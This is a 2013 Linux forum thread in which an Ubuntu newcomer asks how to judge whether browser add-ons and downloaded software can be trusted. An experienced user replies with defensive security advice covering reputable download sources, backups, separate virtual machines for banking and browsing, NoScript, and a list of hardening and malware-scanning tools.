Find the answer to your Linux question:
Results 1 to 4 of 4
If you have answers, links, or search-phrases applying to any of these questions; please join-in. This is not an emergency; I am reading and researching so I do not get ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Jul 2012
    Posts
    5

    Executables, add-ons, extensions. Who to trust? How to test.


    If you have answers, links, or search-phrases applying to any of these questions;
    please join-in. This is not an emergency; I am reading and researching so I do not get into trouble.
    I am Ubuntu 12.04, but will add MS Win, somewhere, someday. I'm mainly concerned with Linux, for now.

    Do you (shoud I) keep javascript turned off?
    If so, how do you watch Youtube?

    IIRC, add-ons and extensions to Firefox (or any browser)
    could contain malware (root-kit?), which ones are to be trusted?

    I will be looking for an add-on to disable Flash readers from automatically starting in a Web page;
    it was recommended, because Flash readers are a vulnerable area.
    How can I tell if an add-on contains malware or if the authors are to be trusted?

    Does Flashgot have a "trusted" reputation? How to test it myself?

    In order of preference what is the safest way to download/install
    security software, so I do not get a fake look-alike?
    Guessing: 1) use software center 2)terminal session: sudo apt-get ..
    3)Google and find it do a direct download.
    Does Update Manager even apply to this consideration?

    Background:
    I was Watching a "Securing Your Linux Box" video; skip to min 45,
    for security, 2 guys discussing; I got some good tips.
    Then I went to the blog site ("Introduction to Linux Hardening" by Chris)
    one of these guys and read a security article.
    Some specifics that they mentioned are listed below.

    Tiger, Logcheck, Tripwire, GUFW, SSH keys (not passwords),
    maybe disable SSH and any service that is not needed,
    Denyhosts, Java (too brief), backups using a utility: Ghost,
    Clonezilla etc.

    Thanks to all.
    Last edited by leaf_also; 06-02-2013 at 10:14 PM.

  2. #2
    Linux User Steven_G's Avatar
    Join Date
    Jun 2012
    Location
    Western US
    Posts
    415
    You ask a lot of good questions. I had a lot of the same questions when when I got in to *nix a couple of years ago. Fortunately for me I had almost 30 years of computer experience to draw on and found out pretty quickly that a lot of the answers are the same no matter what platform you are using. A lot of it is just common sense and experience. I could literally write a book on this. But I'm not going to. I will try to get you on the right path.

    For example, I do one of the "Big No-No's" a lot: I install third party software a lot. But the rules for doing it "safely" are pretty much the same for doze and nix. I don't just slap anything in my system. Webupd8 is a good place to get *nix stuff. They want to protect their rep, so they check for coodies and crap. Same thing goes for CNet and doze. But, that is not 100% fool proof. I have picked up trojans from CNet. So, you have an incremental back up system in place, storing the data on a disk not attached to the machine (USB, NAS), and when you get coodies you roll back your system.

    So, when hunting for 3rd party software look for sources who have skin in the game and a big stake to lose if they get a rep for doling out coodies and crap and then still CYA.

    You also implement compartmentalized computing. I have dozens of specfic use VMs with various OS's that have been locked down to different degrees and with browsers that have been locked down to various degrees depending on their purpose. Most of them share my system wide clipboard, but not all of them. My banking VM is specifically isolated from the system wide clipboard.

    My banking VM is the most locked of all and would never be any good for more general purpose uses. It takes 20 minutes to open up all of the pinholes necessary for a website to work. It does not have java or flash. A lot of elements of most websites simply will not function because they try to reach to far out of the broswer and too far in to the system. It is currently configured to work only with the ~18 sites I need to pay bills and is never used for anything else.

    On the other hand, my general use web surfer VM, which I am using now, has good sec but is not locked down to DefCon 10 gajillion. But, I'm not surfing the web directly on my "real" OS either.

    Quote Originally Posted by leaf_also View Post
    Do you (shoud I) keep javascript turned off?
    If so, how do you watch Youtube?
    See above. The web VM has java and flash. But there's both good security in there and no info in there.

    My "real" box has java, as much as I hate it I just can't get away from it. But, it is never exposed to the web either; which is your big problem with java.

    One of the best things you can do for all around browser sec is run NoScripts.

    My basic attitude towards the web is that it is an insane enemy combatant with extremely contagious STDs and information that is usually wrong but sometimes usefull. This mindset will save you a lot of heartaches, heartburn and headaches.

    IIRC, add-ons and extensions to Firefox (or any browser)
    could contain malware (root-kit?), which ones are to be trusted?
    Same as above: Who has skin in the game based on their rep and their cred? Who's been reviewed by thousands of people with a 92% satisfaction rating and who's been reviewed by 7 people with a 90% bad rating. Who has only 1 review with 100% satisfaction (um, usually from the person who made it)?

    I will include a list of addons I use and trust for general web surfing: AdBlock Edge, AdBlock Plus Pop-up Addon, Ask for Sanitize, Better Privacy, Calomel SSL Validation, Ghostery, Modify Headers, New Tab Homepage, NoScript, Passive Recon, Search Engine Security, Secure Sanitizer, View Source, View Source Chart, Webmail Ad Blocker and WoT.

    All of those plus another 1/2 dozen for banking.

    A special note on Modify Header: Most, but not all, attacks are automated and tailored. For example, you visit a bad site, it will "scan" you (read your user agent string) and then launch different attacks if you are doze or *nix or apple and even differentiate between 7 and XP, etc. Most of this is done with scripts. Well, NoScripts will put the kibosh on a lot of that crap and then I use Modify Header to change my user agent string to a 5 year old version of FireFox running on XP so the stupid thing is trying to run the completely wrong set of attacks on me!

    I will be looking for an add-on to disable Flash readers from automatically starting in a Web page;
    it was recommended, because Flash readers are a vulnerable area.
    How can I tell if an add-on contains malware or if the authors are to be trusted?
    I think I've already covered this above. And the specific addon you're looking for is NoScripts.

    Does Flashgot have a "trusted" reputation? How to test it myself?
    No idea on "Flashgot" itself, I've covered the easy way to "test" trustworthiness.

    In order of preference what is the safest way to download/install
    security software, so I do not get a fake look-alike?
    Guessing: 1) use software center 2)terminal session: sudo apt-get ..
    3)Google and find it do a direct download.
    Does Update Manager even apply to this consideration?
    Basically yes and see above.

    Background:
    I was Watching a "Securing Your Linux Box" video;
    2 guys discussing; I got some good tips.
    Then I went to the blog site ("Introduction to Linux Hardening" by Chris)
    one of these guys and read a security article.
    Some specifics that they mentioned are listed below.

    Tiger, Logcheck, Tripwire, GUFW, SSH keys (not passwords),
    maybe disable SSH and any service that is not needed,
    Denyhosts, Java (too brief), backups using a utility: Ghost,
    Clonezilla etc.
    Yes to all plus IPKungFu, FWsnort, PSAD, Linux Malware Detect, OinkMaster, Bastille, Truecrypt, ArpOn, AppArmor, AppArmor-Utils, AppArmor Profiles, lsat, AIDE, AVG AV, Clam AV, rkhunter, chrootkit and Unhide.

    Stuff you didn't ask that you also need to learn: Network security configuration, Router sec, VPN's, DNS config and leaks, encrypting home partition, net anonymity and what sec settings to change in FireFox.

    That should get you a good start on the basics.

    Thanks to all.
    You're welcome!
    Last edited by Steven_G; 06-02-2013 at 07:11 PM. Reason: Typo, forgot a couple fo addons

  3. #3
    Just Joined!
    Join Date
    Jul 2012
    Posts
    5
    Steven_G,
    Thanks so much for your thoughtful reply.
    It will take some time for me to digest.

    I particularly appreciate your isolated function approach.

    Can you tell me more on VM?
    Edit : I just corrected my view of Wine, ie MS app running on Linux.
    Is Wine an example?

    I do no banking on the internet; however I use a credit/debit card
    occasionally and that specific use could be isolated from general
    web surfing, searching and evaluating.

    I just downloaded/installed one of each variety of security software.
    Tested and tried some of it, already.
    Last edited by leaf_also; 06-03-2013 at 12:09 AM.

  4. #4
    Linux User Steven_G's Avatar
    Join Date
    Jun 2012
    Location
    Western US
    Posts
    415
    VM = Virtual machine. It is a program that kind of creates a "pretend" computer inside your computer. Bad stuff can get out of a virtual machine to the real machine, but there are security steps you can take to help prevent that. And sometimes the bad guys find a way through the code of the VM to the real machine any way. But, like all programs it is constantly updated and it is merely one part of a multi-layered approach to security.

    I use VirtualBox. I recommend that you use the version from their website and not from the Ubuntu repos. It works better and has fewer problems.

    And, no, Wine is a compatbility layer. It helps windows software run directly on a linux system. Think of it as a translater. And you need to learn how to secure it as well. There is the possibilty that a windows virus in wine could have some effects on the linux side of your system. But, it is fairly easy to secure it.

    And separating parts of the system from each other is not just for banking. I have a virtual machine that is just for general web surfing and nothing else. The goal is to put as many layers of security as practically possible between both your important information / your core operating system and the outside world.
    Last edited by Steven_G; 06-03-2013 at 03:57 AM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •